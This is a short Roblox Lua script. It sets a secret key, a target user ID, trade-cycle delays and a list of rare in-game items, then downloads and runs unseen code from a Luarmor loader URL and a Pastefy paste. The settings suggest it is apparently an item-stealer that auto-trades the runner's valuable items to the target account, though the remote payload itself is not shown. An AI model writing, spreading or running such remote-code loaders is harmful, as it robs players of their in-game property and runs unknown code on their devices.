getgenv().SECRET_KEY = "mrr_1ffa2accb3ca4593858c306646b361cb"
getgenv().TARGET_ID = 9132221975
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Garama and Madundung"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Nacho Spyder"] = true,
    ["La Secret Combinasion"] = true,
    ["Griffin"] = true,
    ["Festive 67"] = true,
    ["Ketupat Kepat"] = true,
    ["Burguro And Fryuro"] = true,
    ["La Supreme Combinasion"] = true,
    ["Headless Horseman"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Quesadilla Crocodila"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://pastefy.app/y0GpUXcb/raw"))()
end)
